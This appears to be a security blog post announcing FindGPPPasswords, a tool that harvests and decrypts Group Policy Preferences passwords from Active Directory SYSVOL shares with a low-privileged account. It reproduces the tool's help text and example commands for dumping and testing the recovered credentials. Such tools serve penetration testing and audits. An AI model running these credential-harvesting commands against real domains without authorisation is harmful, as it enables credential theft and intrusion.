FindGPPPasswords: Uncover Group Policy Preferences Passwords

by ddos · Published · Updated

FindGPPPasswords

A cross-platform tool to find and decrypt Group Policy Preferences passwords from the SYSVOL share using low-privileged domain accounts.

Features

  •  Only requires a low privileges domain user account.
  •  Automatically gets the list of all domain controllers from the LDAP.
  •  Finds all the Group Policy Preferences Passwords present in SYSVOL share on each domain controller.
  •  Decrypts the passwords and prints them in cleartext.
  •  Outputs to a Excel file with option --export-xlsx <path_to_xlsx_file>.
  •  Option to test the credentials of the found GPP passwords with the --test-credentials option.
  •  Multi-threaded mode with option --threads <number_of_threads>.

Use

$ ./FindGPPPasswords -h
FindGPPPasswords - by Remi GASCOU (Podalirius) @ TheManticoreProject - v1.2

Usage: FindGPPPasswords [--quiet] [--debug] [--no-colors] [--export-xlsx <string>] [--test-credentials] --domain <string> --username <string> [--password <string>] [--hashes <string>] [--threads <int>] [--nameserver <string>] --dc-ip <string> [--ldap-port <tcp port>] [--use-ldaps]

  -q, --quiet      Show no information at all. (default: false)
  -d, --debug      Debug mode. (default: false)
  -nc, --no-colors No colors mode. (default: false)

  Additional Options:
    -x, --export-xlsx <string> Path to output Excel file. (default: "")
    -tc, --test-credentials    Test credentials. (default: false)

  Authentication:
    -d, --domain <string>   Active Directory domain to authenticate to.
    -u, --username <string> User to authenticate as.
    -p, --password <string> Password to authenticate with. (default: "")
    -H, --hashes <string>   NT/LM hashes, format is LMhash:NThash. (default: "")
    -T, --threads <int>     Number of threads to use. (default: 0)

  DNS Settings:
    -ns, --nameserver <string> IP Address of the DNS server to use in the queries. If omitted, it will use the IP of the domain controller specified in the -dc parameter. (default: "")

  LDAP Connection Settings:
    -dc, --dc-ip <string>       IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted, it will use the domain part (FQDN) specified in the identity parameter.
    -lp, --ldap-port <tcp port> Port number to connect to LDAP server. (default: 389)
    -L, --use-ldaps             Use LDAPS instead of LDAP. (default: false)

Example

By default, the tool will only find the GPP passwords and print them in cleartext:

./FindGPPPasswords-linux-amd64 –domain <domain> –username <username> –password <password>

There is also the possibility to test the credentials of the found GPP passwords with the --test-credentials option.

./FindGPPPasswords-linux-amd64 –test-credentials –domain <domain> –username <username> –password <password>

Download

Tags: Active DirectoryFindGPPPasswordsGPPGroup Policypasswordsecurity tool